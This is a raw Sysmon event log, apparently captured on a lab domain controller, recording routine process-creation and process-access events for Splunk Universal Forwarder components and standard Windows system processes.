Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:15.277{08A6967A-4B27-6000-A805-000000009A01}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B28-6000-AA05-000000009A01}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4B28-6000-AA05-000000009A01}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.620{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B28-6000-AA05-000000009A01}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.621{08A6967A-4B28-6000-AA05-000000009A01}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:16.104{08A6967A-4B27-6000-A905-000000009A01}66643580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.683{08A6967A-4B29-6000-AB05-000000009A01}47364900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B29-6000-AB05-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4B29-6000-AB05-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.526{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B29-6000-AB05-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:17.527{08A6967A-4B29-6000-AB05-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.886{08A6967A-4B2A-6000-AD05-000000009A01}67365060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B2A-6000-AD05-000000009A01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4B2A-6000-AD05-000000009A01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.729{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B2A-6000-AD05-000000009A01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.730{08A6967A-4B2A-6000-AD05-000000009A01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.214{08A6967A-4B2A-6000-AC05-000000009A01}44683796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 